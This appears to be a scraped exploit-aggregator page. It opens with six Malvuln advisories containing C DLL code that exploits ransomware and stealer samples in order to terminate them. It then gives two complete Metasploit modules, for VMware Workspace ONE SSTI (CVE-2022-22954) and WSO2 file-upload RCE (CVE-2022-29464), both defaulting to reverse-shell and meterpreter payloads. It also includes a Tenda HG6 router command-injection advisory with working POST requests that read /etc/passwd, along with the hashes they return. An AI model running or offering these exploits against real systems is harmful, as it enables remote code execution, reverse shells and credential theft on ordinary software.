Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/0adb0e2ac8aa969fb088ee95c4a91536.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: RedLine.Stealer Vulnerability: Code Execution Description: RedLine looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware. The exploit dll will simply display a Win32API message box and call exit(). Our RedLine exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware vuln will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: RedLine Type: PE32 MD5: 0adb0e2ac8aa969fb088ee95c4a91536 Vuln ID: MVID-2022-0578 Exploit/PoC: Video PoC URL: https://www.youtube.com/watch?v=HQ2JTyckZpo Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Copy the DLL to Windows/System32 3) Run the malware and BOOM! #include "windows.h" #include "stdio.h" //By malvuln - 5/2022 //Target: RedLine Stealer //MD5: 0adb0e2ac8aa969fb088ee95c4a91536 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //compile as x64 //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //DLL must live under Windows/System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/7d7ee58c2696794b3be958b165eb61a9.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: REvil Ransom Vulnerability: Code Execution Description: REvil looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own vulnerability will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: REvil Type: PE32 MD5: 7d7ee58c2696794b3be958b165eb61a9 Vuln ID: MVID-2022-0577 Disclosure: 05/03/2022 Video PoC URL: https://www.youtube.com/watch?v=WnDxcYzfbUQ Exploit/PoC: 1) Compile the following C code as "CLDAPI.dll" 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "CLDAPI.dll" 4) Run Conti #include "windows.h" #include "stdio.h" //By malvuln //Purpose: Code Execution //Target: REvi Ransomware //MD5: 7d7ee58c2696794b3be958b165eb61a9 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c CLDAPI.c -m32 //gcc -shared -o CLDAPI.dll CLDAPI.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Conti Ransom Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own vulnerability will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Conti Type: PE32 MD5: 9eb9197cd58f4417a27621c4e1b25a71 Vuln ID: MVID-2022-0576 Disclosure: 05/03/2022 Video PoC URL: https://www.youtube.com/watch?v=Sb2fKCOSoew Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run Conti #include "windows.h" #include "stdio.h" //By malvuln //Purpose: Code Execution //Target: Conti Ransomware //MD5: 9eb9197cd58f4417a27621c4e1b25a71 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/2ffc2446a2a6cf04c06a85deb43b9fb8.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: LokiLocker Ransom Vulnerability: Code Execution Description: LokiLocker looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: LokiLocker Type: PE32 MD5: 2ffc2446a2a6cf04c06a85deb43b9fb8 Vuln ID: MVID-2022-0575 Disclosure: 05/03/2022 Video PoC URL: https://www.youtube.com/watch?v=ZotoaovAAXw Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run the malware #include "windows.h" #include "stdio.h" //By malvuln //Purpose: Code Execution //Target: LokiLocker Ransomware //MD5: 2ffc2446a2a6cf04c06a85deb43b9fb8 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/998022b70d83c6de68e5bdf94e0f8d71.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: BlackBasta Ransom Vulnerability: Code Execution Description: BlackBasta looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). Our BlackBasta exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: BlackBasta Type: PE32 MD5: 998022b70d83c6de68e5bdf94e0f8d71 Vuln ID: MVID-2022-0574 Disclosure: 05/02/2022 Video PoC URL: https://www.youtube.com/watch?v=Fezzdw6f7ls Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Place the DLL in Windows/System32 3) Run the malware and BOOM! #include "windows.h" #include "stdio.h" //By malvuln - 5/2022 //Target: BlackBasta Ransom //MD5: 998022b70d83c6de68e5bdf94e0f8d71 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //compile as x64 //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //DLL must live under Windows/System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/40f2238875fcbd2a92cfefc4846a15a8.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.AvosLocker Vulnerability: Code Execution Description: The ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: AvosLocker Type: PE32 MD5: 40f2238875fcbd2a92cfefc4846a15a8 Vuln ID: MVID-2022-0573 Disclosure: 05/02/2022 Video PoC URL: https://www.youtube.com/watch?v=jCxG46dEmso Exploit/PoC: 1) Compile the following C code as "mpr.dll" 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "mpr.dll" 4) Run the malware #include "windows.h" #include "stdio.h" //By malvuln - 5/2/2022 //Vuln: Code Execution //Target: Ransom.AvosLocker //MD5: 40f2238875fcbd2a92cfefc4846a15a8 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c mpr.c -m32 //gcc -shared -o mpr.dll mpr.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); //printf("Current directory: %s\n", buf); //check the path int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'VMware Workspace ONE Access CVE-2022-22954', 'Description' => %q{ This module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the "horizon" user. }, 'Author' => [ 'mr_me', # Discovery 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC 'wvu' # Exploit and independent analysis ], 'References' => [ ['CVE', '2022-22954'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'], ['URL', 'https://srcincite.io/advisories/src-2022-0005/'], ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'], ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis'] # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433 ], 'DisclosureDate' => '2022-04-06', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}") return CheckCode::Unknown unless ret return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/) CheckCode::Vulnerable end def exploit print_status("Executing #{payload_instance.refname} (#{target.name})") case target['Type'] when :cmd execute_command(payload.encoded) when :dropper execute_cmdstager end end def execute_command(cmd, _opts = {}) bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}" vprint_status("Executing command: #{bash_cmd}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, ssti_uri), 'vhost' => rand_text_alphanumeric(8..16), 'vars_get' => { %w[code error].sample => rand_text_alphanumeric(8..16), # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")}) } }, 3.5) return unless res return '' unless res.code == 400 && res.body.include?('auth.context.invalid') res.body end def ssti_uri %w[ /catalog-portal/hub-ui /catalog-portal/hub-ui/byob /catalog-portal/ui /catalog-portal/ui/oauth/verify ].sample end def ssti_param %w[deviceType deviceUdid].sample end end </code></pre>

<pre><code> Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version: TD_HG6_XPON_TDE_ISP Summary: HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces. Tested on: Boa/0.93.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5706 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php 22.04.2022 -- ping.asp: --------- POST /boaform/formPing HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564 --- TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh runomci.sh runsdk.sh samba scripts services setprmt_reject shells simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in ssl_cert.pem ssl_key.pem version wscd.conf ping6.asp: ---------- POST /boaform/formPing6 HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp --- boa.conf web tracert.asp: ------------ POST /boaform/formTracert HTTP/1.1 Host: 192.168.1.1 traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp --- /home/httpd tracert6.asp: ------------- POST /boaform/formTracert6 HTTP/1.1 Host: 192.168.1.1 traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp --- admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh nobody:x:0:0::/tmp:/dev/null user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WSO2 Arbitrary File Upload to RCE', 'Description' => %q{ This module abuses a vulnerability in certain WSO2 products that allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. }, 'Author' => [ 'Orange Tsai', # Discovery 'hakivvi', # analysis and PoC 'wvu', # PoC 'Jack Heysel <jack_heysel[at]rapid7.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2022-29464'], [ 'URL', 'https://github.com/hakivvi/CVE-2022-29464' ], [ 'URL', 'https://twitter.com/wvuuuuuuuuuuuuu/status/1517433974003576833' ], [ 'URL', 'https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738' ] ], 'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp', 'SSL' => true, 'RPORT' => 9443 }, 'Privileged' => false, 'Targets' => [ [ 'Java Dropper', { 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Type' => :java_dropper, 'DefaultOptions' => { 'WfsDelay' => 10 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2022-04-01', 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options( [ OptInt.new('WAR_DEPLOY_DELAY', [true, 'How long to wait for the war file to deploy, in seconds', 20 ]), OptString.new('TARGETURI', [ true, 'Relative URI of WSO2 product installation', '/']) ] ) end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fileupload', 'toolsAny'), 'method' => 'POST' ) if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /WSO2/ Exploit::CheckCode::Appears else Exploit::CheckCode::Unknown end end def prepare_payload(app_name) print_status('Preparing payload...') war_payload = payload.encoded_war.to_s fname = app_name + '.war' path_traveral = '../../../../repository/deployment/server/webapps/' + fname post_data = Rex::MIME::Message.new post_data.add_part(war_payload, 'application/octet-stream', 'binary', "form-data; name=\"#{path_traveral}\"; filename=\"#{fname}\"") post_data end def upload_payload(post_data) print_status('Uploading payload...') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fileupload', 'toolsAny'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s ) if res && res.code == 200 print_good('Payload uploaded successfully') else fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed') end end def execute_payload(app_name) res = nil print_status('Executing payload... ') retry_until_true(timeout: datastore['WAR_DEPLOY_DELAY']) do print_status('Waiting for shell... ') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, app_name), 'method' => 'GET' ) if res && res.code == 200 break else next end end if res && res.code == 200 print_good('Payload executed successfully') else fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed') end end # Retry the block until it returns a truthy value. Each iteration attempt will # be performed with expoential backoff. If the timeout period surpasses, false is returned. def retry_until_true(timeout:) start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) ending_time = start_time + timeout retry_count = 0 while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time result = yield return result if result retry_count += 1 remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) break if remaining_time_budget <= 0 delay = 2**retry_count if delay >= remaining_time_budget delay = remaining_time_budget vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}") else vprint_status("Sleeping for #{delay} seconds before attempting again") end sleep delay end end def exploit app_name = Rex::Text.rand_text_alpha(4..7) data = prepare_payload(app_name) upload_payload(data) execute_payload(app_name) end end </code></pre>